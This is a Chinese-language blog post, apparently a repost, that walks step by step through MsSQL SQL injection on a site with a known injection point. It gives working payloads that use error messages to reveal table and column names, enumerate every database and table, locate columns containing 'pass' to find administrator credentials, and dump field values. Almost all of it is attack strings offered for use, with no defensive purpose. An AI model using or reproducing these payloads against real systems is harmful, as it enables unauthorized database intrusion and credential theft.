• MsSQL注入猜解数据库技术

    一、having与group by查询报表名与字段名
    1.当确定有注入点以后,直接提交having 1=1-- 在错误信息里面即可得到当前表名的第一个字段。
    2.然后提交
    group by 字段名1 having 1=1--
    即可得到第二个字段
    3.然后
    group by 字段名1,字段名2 having 1=1--

    4.group by 字段名1,字段名2,字段名3,字段名n having 1=1--
    直到返回正常信息,即可得到所有的字段名

    二、order by与数据类型转换报错法
    1.爆所有数据库名
    and db_name()=0--  爆当前库名

    and db_name(n)>0--
    通过变换n的值得到所有数据库名

    and 0=(select top n cast([name] as nvarchar(256))%2bchar(94)%2bcast([filename] as nvarchar(256)) from(select top 1 dbid,name,filename from [master].[dbo].[sysdatabases] order by [dbid]) t order by [dbid] desc)--

     通过变换n的值得到所有数据库名

    2.爆所有表名

    通过下面这个可以得知表的数量
    and (select cast(count(1) as varchar(10))%2bchar(94) from [sysobjects] where xtype=char(85) and status!=0)=0--

    爆第一个表名
    and (select top 1 cast(name as varchar(256)) from (select top 1 id,name from [sysobjects] where xtype=char(85) and status!=0 order by id) t order by id desc)=0--

    然后继续
    and (select top 1 cast(name as varchar(256)) from (select top 2 id,name from [sysobjects] where xtype=char(85) and status!=0 order by id) t order by id desc)=0--

    以上是爆当前表的,如果爆其他表的话

    下面是爆出master数据库的第一个表名
    and 0<>(select top 1 name from master.dbo.sysobjects where xtype=0x7500 and name not in(select top 1 name from master.dbo.sysobjects where xtype=0x7500))--
    递增数字就可以爆出所有的表名啦

    3.爆出包含管理员账户的表名及字段
    and (select top 1 cast(id as nvarchar(20))%2bchar(124) from [库名]..[sysobjects] where name='表名')=0--

    爆出的是字段的ID,然后再提交如下,爆出字段数目
    and (select cast(count(1) as varchar(10))%2bchar(94) from [库名]..[syscolumns] where id=373576369)=0--

    然后再提交
    and (select top 1 cast(name as varchar(8000)) from (select top 1 colid,name from [库名]..[syscolumns] where id=373576369 order by colid) t order by colid desc)=0--

    变化数字得到所有字段名

    4.一步爆出包含管理员账户的表与字段
    and (select top 1 t_name%2bchar(124)%2bc_name from (select top 20 object_name(id) as t_name,name as c_name from syscolumns where charindEx(cast(0x70617373 as varchar(2000)),name)>0 and left(name,1)!=0x40 order by t_name asc) as T order by t_name desc)>0--

    其中0x70617373是pass的十六进制编码

    5.爆所有字段值
    and (select cast(count(1) as varchar(8000))%2bchar(94) from [库名]..[表名] where 1=1)>0--
    以上爆出记录条数

    然后
    and (select top 1 isnull(cast([字段值1] as nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([字段值2] as nvarchar(4000)),char(32)) from [表名] where 1=1 order by [字段值1])=0--

    三、查询宝库的另一种方法
    1.爆所有数据库名
    and 1=(select name from master.dbo.sysdatabases where dbid=1)--

    增加上面的dbid值,获取其他数据库名

    2.爆出当前数据库中的所有表
    and (select top 1 name from (select top n name from sysobjects where xtype=0x75 order by name) t order by name desc)=0

    改变n数字查询所有表名

    3.如果要垮裤查询其他数据库的表名,可提交
    and (select top 1 name from(select top n name from 数据库名..sysobjects where xtype=0x75 order by name) t order by name desc)=0
    改变n的值查询所有表名

    3.爆字段名及字段值
    and (select col_name(object_id('hehe'),n))=0
    改变n的值,获得所有字段名

    and (select top 1 字段名 from 表名)>0  获得第一个字段值后

    and (select top 1 字段名 from 表名 where 字段名<>字段值1)>0

  • 相关阅读:
    Android MVP架构分析
    JavaEE基本了解
    学习面试题Day09
    使用反射来实现简单工厂模式
    Android Material Design简单使用
    c语言 找最小值
    c++ 计算指定半径圆的面积
    c++ 字符串拷贝以及合并
    python yaml文件读写
    python 列表元素替换以及删除
  • 原文地址:https://www.cnblogs.com/shanmao/p/2772319.html
Copyright © 2020-2023  润新知